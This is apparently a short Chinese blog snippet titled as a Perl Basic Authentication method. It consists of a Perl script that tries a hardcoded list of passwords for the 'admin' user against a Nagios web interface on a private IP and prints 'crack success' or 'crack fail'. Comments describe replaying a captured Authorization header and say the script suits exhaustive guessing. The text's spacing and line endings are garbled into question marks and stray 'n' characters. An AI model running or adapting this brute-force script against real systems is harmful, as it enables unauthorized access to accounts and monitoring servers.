Perl脚本Basic Authentication方法
- #!/usr/bin/perl?
- ?
- use?strict;?
- use?warnings;?
- use?HTTP::Request;?
- use?LWP::UserAgent;?
- use?Data::Dumper;?
- use?Getopt::Std;?
- ?
- my?%options?=?();?
- getopt("d:",%options);?
- ?
- my?$debug?=?$options{d}?||?0;?
- ?
- my?@password_array?=?qw(ken?jack?sunny?ben?kick);?
- ?
- &main(@password_array);?
- ?
- ?
- ?
- sub?main?{?
- ????foreach?my?$password?(@_)?{?
- ????????my?$status?=?&get_url($password);?
- ????????if?($status?==?1)?{?
- ????????????????last;?
- ????????}?
- ????}?
- }?
- ?
- ?
- sub?get_url?{?
- ????my?$password?=?shift;?
- ?
- ????my?$ua;?
- ????my?$req;?
- ????my?$res;?
- ?
- ????my?$url?=?'http://192.168.4.40:8010/nagios';?
- ?????
- ????$ua?=?LWP::UserAgent->new;?
- ????$ua->agent('Mozilla/5.0?(Windows;?U;?Windows?NT?5.1)?Gecko/20070309?Firefox/2.0.0.3');?
- ????$ua->timeout(5);?
- ?????
- ????$req?=?HTTP::Request->new(?GET?=>?$url?);?
- ????#方法1:使用Firefox登陆这个Url输入用户密码时抓包,将密文抓下来。贴在下面?
- ????#$req->header("Authorization"?=>?'Basic?bW9ua3R4cep1Y3dlYl9tb25pdG9y');?
- ????#方法2:可以直接输入用户名和密码,适合进行穷举时使用?
- ????$req->authorization_basic('admin',?$password);?
- ?????
- ????$res?=?$ua->request($req);?
- ????print?"**************************?content?begin?**************************n"?if?$debug;?
- ????print?$res->content?.?"n"?if?$debug;?
- ????print?"**************************?content?end?**************************n"?if?$debug;?
- ?????
- ????print?'***************************?Dumper?$res?***************************'?.?"n"?if?$debug;?
- ????print?Dumper?$res?if?$debug;?
- ????print?'***************************?Dumper?$res?***************************'?.?"n"?if?$debug;?
- ?????
- ????if?($res->is_success)?{?
- ????????print?"crack?success,password:?"?.?$password?.?"n";?
- ????????return?1;?
- ????}?else?{?
- ????????print?"crack?fail,password:?"?.?$password?.?"n";?
- ????????return?0;?
- ????}?
- }?
